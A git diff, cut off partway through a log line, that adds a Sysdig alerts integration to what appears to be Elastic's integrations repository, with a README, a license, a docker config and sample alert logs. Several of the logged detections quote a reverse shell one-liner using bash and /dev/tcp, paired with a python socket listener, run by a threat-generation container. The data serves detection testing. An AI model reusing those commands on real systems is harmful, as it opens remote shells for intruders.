diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 5269b9b1506..51fc88b41eb 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -346,6 +346,7 @@ /packages/symantec_endpoint_security @elastic/security-service-integrations /packages/synthetics @elastic/obs-ux-infra_services-team /packages/synthetics_dashboards @elastic/obs-ux-infra_services-team +/packages/sysdig @elastic/security-service-integrations /packages/sysmon_linux @elastic/sec-linux-platform /packages/system @elastic/obs-infraobs-integrations /packages/system/changelog.yml @elastic/obs-infraobs-integrations @elastic/sec-linux-platform @elastic/sec-windows-platform diff --git a/packages/sysdig/LICENSE.txt b/packages/sysdig/LICENSE.txt new file mode 100644 index 00000000000..809108b857f --- /dev/null +++ b/packages/sysdig/LICENSE.txt @@ -0,0 +1,93 @@ +Elastic License 2.0 + +URL: https://www.elastic.co/licensing/elastic-license + +## Acceptance + +By using the software, you agree to all of the terms and conditions below. + +## Copyright License + +The licensor grants you a non-exclusive, royalty-free, worldwide, +non-sublicensable, non-transferable license to use, copy, distribute, make +available, and prepare derivative works of the software, in each case subject to +the limitations and conditions below. + +## Limitations + +You may not provide the software to third parties as a hosted or managed +service, where the service provides users with access to any substantial set of +the features or functionality of the software. + +You may not move, change, disable, or circumvent the license key functionality +in the software, and you may not remove or obscure any functionality in the +software that is protected by the license key. + +You may not alter, remove, or obscure any licensing, copyright, or other notices +of the licensor in the software. Any use of the licensor’s trademarks is subject +to applicable law. + +## Patents + +The licensor grants you a license, under any patent claims the licensor can +license, or becomes able to license, to make, have made, use, sell, offer for +sale, import and have imported the software, in each case subject to the +limitations and conditions in this license. This license does not cover any +patent claims that you cause to be infringed by modifications or additions to +the software. If you or your company make any written claim that the software +infringes or contributes to infringement of any patent, your patent license for +the software granted under these terms ends immediately. If your company makes +such a claim, your patent license ends immediately for work on behalf of your +company. + +## Notices + +You must ensure that anyone who gets a copy of any part of the software from you +also gets a copy of these terms. + +If you modify the software, you must include in any modified copies of the +software prominent notices stating that you have modified the software. + +## No Other Rights + +These terms do not imply any licenses other than those expressly granted in +these terms. + +## Termination + +If you use the software in violation of these terms, such use is not licensed, +and your licenses will automatically terminate. If the licensor provides you +with a notice of your violation, and you cease all violation of this license no +later than 30 days after you receive that notice, your licenses will be +reinstated retroactively. However, if you violate these terms after such +reinstatement, any additional violation of these terms will cause your licenses +to terminate automatically and permanently. + +## No Liability + +*As far as the law allows, the software comes as is, without any warranty or +condition, and the licensor will not be liable to you for any damages arising +out of these terms or the use or nature of the software, under any kind of +legal claim.* + +## Definitions + +The **licensor** is the entity offering these terms, and the **software** is the +software the licensor makes available under these terms, including any portion +of it. + +**you** refers to the individual or entity agreeing to these terms. + +**your company** is any legal entity, sole proprietorship, or other kind of +organization that you work for, plus all organizations that have control over, +are under the control of, or are under common control with that +organization. **control** means ownership of substantially all the assets of an +entity, or the power to direct its management and policies by vote, contract, or +otherwise. Control can be direct or indirect. + +**your licenses** are all the licenses granted to you for the software under +these terms. + +**use** means anything you do with the software requiring one of your licenses. + +**trademark** means trademarks, service marks, and similar rights. diff --git a/packages/sysdig/_dev/build/build.yml b/packages/sysdig/_dev/build/build.yml new file mode 100644 index 00000000000..e2b012548e0 --- /dev/null +++ b/packages/sysdig/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: git@v8.11.0 diff --git a/packages/sysdig/_dev/build/docs/README.md b/packages/sysdig/_dev/build/docs/README.md new file mode 100644 index 00000000000..e9465995277 --- /dev/null +++ b/packages/sysdig/_dev/build/docs/README.md @@ -0,0 +1,38 @@ +# Sysdig Integration +This integration allows for the shipping of [Sysdig](https://sysdig.com/) alerts to Elastic for observability and organizational awareness. Alerts can then be analyzed by using either the dashboard included with the integration or via the creation of custom dashboards within Kibana. + +## Data Streams +The Sysdig integration collects one type of data stream: alerts. + +**Alerts** The Alerts data stream collected by the Sysdig integration is comprised of Sysdig Alerts. See more details about Sysdig Alerts in [Sysdig's Alerts Documentation](https://docs.sysdig.com/en/docs/sysdig-monitor/alerts/). A complete list of potential fields used by this integration can be found in the [Logs reference](#logs-reference) + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +Sysdig must be configured to output alerts to a supported output channel as defined in [Setup](#setup). The system will only receive common fields output by Sysdig's rules, meaning that if a rule does not include a desired field the rule must be edited in Sysdig to add the field. + +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +In order to capture alerts from Sysdig you **must** configure Sysdig to output Alerts as JSON via [HTTP](#http-input). + +### HTTP Input + +The HTTP input allows the Elastic Agent to receive Sysdig Alerts via HTTP webhook. + +**Required:** To configure Sysdig to output JSON, you must set up as webhook notification channel as outlined in the [Sysdig Documentation](https://docs.sysdig.com/en/docs/administration/administration-settings/outbound-integrations/notifications-management/set-up-notification-channels/configure-a-webhook-channel/). + +## Logs Reference + +### alerts + +Sysdig alerts can contain a multitude of various fields pertaining to the type of activity on the host machine. + +{{ fields "alerts" }} + +**Example event** + +{{ event "alerts" }} \ No newline at end of file diff --git a/packages/sysdig/_dev/deploy/docker/docker-compose.yml b/packages/sysdig/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..1f0caf7a6f7 --- /dev/null +++ b/packages/sysdig/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,9 @@ +services: + sysdig-alerts-http: + image: docker.elastic.co/observability/stream:v0.16.0 + volumes: + - ./sample_logs:/sample_logs:ro + environment: + - STREAM_PROTOCOL=webhook + - STREAM_ADDR=http://elastic-agent:9035/ + command: log --start-signal=SIGHUP --delay=5s /sample_logs/sysdig.log diff --git a/packages/sysdig/_dev/deploy/docker/sample_logs/sysdig.log b/packages/sysdig/_dev/deploy/docker/sample_logs/sysdig.log new file mode 100644 index 00000000000..fb8957ca56d --- /dev/null +++ b/packages/sysdig/_dev/deploy/docker/sample_logs/sysdig.log @@ -0,0 +1,15 @@ +{"id":"17dec715376910362c8c3f62a4ceda2e","type":"policy","timestamp":1720031001639981110,"timestampRFC3339Nano":"2024-07-03T18:23:21.63998111Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Activity Logs","description":"This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.","severity":7,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","content":{"ruleName":"User Management Event Detected","ruleType":"RULE_TYPE_FALCO","ruleTags":["host","container","MITRE","MITRE_TA0003_persistence","MITRE_T1136_create_account","MITRE_T1136.001_create_account_local_account","MITRE_T1070_indicator_removal","MITRE_TA0005_defense_evasion","MITRE_TA0040_impact","MITRE_T1531_account_access_removal","MITRE_T1098_account_manipulation"],"output":"Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name=\u003cNA\u003e proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent=\u003cNA\u003e gggparent=\u003cNA\u003e container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request=\u003cNA\u003e proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname=\u003cNA\u003e user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)","fields":{"container.name":"threatgen","proc.cmdline":"userdel tmp_suid_user","proc.cwd":"/tmp/","proc.exepath":"/usr/sbin/userdel","proc.name":"userdel","proc.pcmdline":"pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)","proc.pid":"2140169","proc.pname":"pwsh","proc.ppid":"2140088","user.name":"root","user.uid":"0"},"policyVersion":35,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec7142e0084978fbafcb03e2cabca","type":"policy","timestamp":1720030997187167383,"timestampRFC3339Nano":"2024-07-03T18:23:17.187167383Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"c708ed01-9700-4787-91a5-6b2fb9863c0a","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=1 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17e04791d768c4aba1e9c40d944b8598","type":"policy","timestamp":1720453749365327019,"timestampRFC3339Nano":"2024-07-08T15:49:09.365327019Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Activity Logs","description":"This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.","severity":7,"agentId":58462623,"containerId":"8736272bd5fb","machineId":"7c:1e:52:0b:2b:61","hostMac":"7c:1e:52:0b:2b:61","content":{"ruleName":"Drop and execute new binary in container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","MITRE","MITRE_T1525_implant_internal_image","MITRE_TA0003_persistence"],"output":"Executing binary ruby with parent livenessprobe.s not part of base image mcr.microsoft.com/azuremonitor/containerinsights/ciprod on ama-logs under user root and execution path /usr/bin/ruby (proc.name=ruby proc.pname=livenessprobe.s fd.name=\\u003cNA\\u003e proc.cmdline=ruby /opt/dcr-config-parser.rb proc.pcmdline=livenessprobe.s /opt/livenessprobe.sh gparent=runc ggparent=containerd-shim gggparent=systemd evt.type=execveproc.args=/opt/dcr-config-parser.rb proc.pid=2817268 proc.cwd=/opt/ proc.ppid=2817253 proc.exepath=/usr/bin/ruby user.uid=0 user.loginuid=-1 user.loginname=\\u003cNA\\u003e user.name=root group.gid=0 group.name=root container.id=8736272bd5fb container.name=ama-logs image=mcr.microsoft.com/azuremonitor/containerinsights/ciprod:3.1.21)","fields":{"container.name":"ama-logs","proc.cmdline":"ruby /opt/dcr-config-parser.rb","proc.cwd":"/opt/","proc.exepath":"/usr/bin/ruby","proc.name":"ruby","proc.pcmdline":"livenessprobe.s /opt/livenessprobe.sh","proc.pid":"2817268","proc.pname":"livenessprobe.s","proc.ppid":"2817253","user.name":"root","user.uid":"0"},"policyVersion":35,"policyOrigin":"Sysdig"},"labels":{"azure.instanceId":"ba53fc47-1119-4cbb-af2b-6d38b0e56160","azure.instanceName":"aks-userpool-12996081-vmss_1","azure.instanceSize":"Standard_D8ds_v5","cloudProvider.account.id":"7a100e05-8316-474d-99c0-b824d0e86366","cloudProvider.name":"azure","cloudProvider.region":"eastus","host.hostName":"aks-userpool-12996081-vmss000001","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"kube-system","kubernetes.pod.name":"ama-logs-cxhbd","kubernetes.workload.type":"daemonset"}} +{"id":"17dec7142e00a9068fb9185f9aa66c21","type":"policy","timestamp":1720030997187176710,"timestampRFC3339Nano":"2024-07-03T18:23:17.18717671Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"eb2b3e3c-ebc1-433f-88c7-2e032b75aadc","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec36048564c002c559dbdad20be41","type":"policy","timestamp":1720026926000000000,"timestampRFC3339Nano":"2024-07-03T17:15:26Z","originator":"policy","category":"remote","source":"aws_cloudtrail","name":"Describe Instances - Sysdig AWS Activity Logs","description":"A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)","severity":7,"containerId":"","machineId":"","content":{"ruleName":"Describe Instances","ruleType":"RULE_TYPE_FALCO","ruleTags":["MITRE_T1082_system_information_discovery","Cloud","AWS","AWS_EC2","MITRE","MITRE_TA0007_discovery","MITRE_T1580_cloud_infrastructure_discovery"],"output":"A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)","fields":{"container.name":""},"policyVersion":36,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"414773805239","cloudProvider.name":"aws","cloudProvider.region":"us-east-1"}} +{"id":"17dec7142e051355585daf677e472ed2","type":"policy","timestamp":1720030997187466069,"timestampRFC3339Nano":"2024-07-03T18:23:17.187466069Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"81618044-80a5-44af-b27a-46acead3a4bc","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Privileged Shell Spawned Inside Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","shell","SOC2","SOC2_CC6.1","PCI","PCI_DSS","PCI_DSS_10.1","PCI_DSS_10.2.1","NIST","NIST_800-171","NIST_800-171_3.1.1","NIST_800-171_3.1.2","NIST_800-171_3.14.6","NIST_800-171_3.3.1","NIST_800-171_3.3.2","NIST_800-53","NIST_800-53_AC-17","NIST_800-53_AU-6(8)","NIST_800-53_AU-2","NIST_800-53_AC-2(4)","FedRAMP","FedRAMP_AC-2(4)","FedRAMP_AU-2","ISO","ISO_27001","ISO_27001_A.9.4.4","HIPAA","HIPAA_164.308(a)","HIPAA_164.310(b)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.i","HITRUST_CSF_01.j","HITRUST_CSF_01.n","HITRUST_CSF_01.p","HITRUST_CSF_01.s","HITRUST_CSF_01.y","HITRUST_CSF_06.i","HITRUST_CSF_09.aa","HITRUST_CSF_09.ab","HITRUST_CSF_09.ad","HITRUST_CSF_09.ae","HITRUST_CSF_09.m","HITRUST_CSF_09.s","GDPR","GDPR_32.1","GDPR_32.2","MITRE","MITRE_T1609_container_administration_command","MITRE_TA0002_execution","MITRE_TA0004_privilege_escalation","MITRE_T1068_exploitation_for_privilege_escalation","CIS"],"output":"Privileged Shell Spawned in Container threatgen with image docker.io/dockerbadboy/art by parent bash with cmdline bash -i under user root (user.uid=0 proc.cmdline=bash -i proc.name=bash proc.pname=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 user.name=root user.loginuid=-1 proc.args=-i container.name=threatgen evt.type=execve evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.sid=1 proc.exepath=/usr/bin/bash user.loginname=\u003cNA\u003e group.gid=0 group.name=root, container.image=docker.io/dockerbadboy/art)","fields":{"container.name":"threatgen","proc.cmdline":"bash -i","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec7142e03c2766a36e7950883c5c4","type":"policy","timestamp":1720030997187379830,"timestampRFC3339Nano":"2024-07-03T18:23:17.18737983Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"35cf0ae3-a4ed-4c00-831f-f0b7c8489718","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process python3 with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=python3 parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close(); terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140103 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/python3.10 user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/python3.10","proc.name":"python3","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 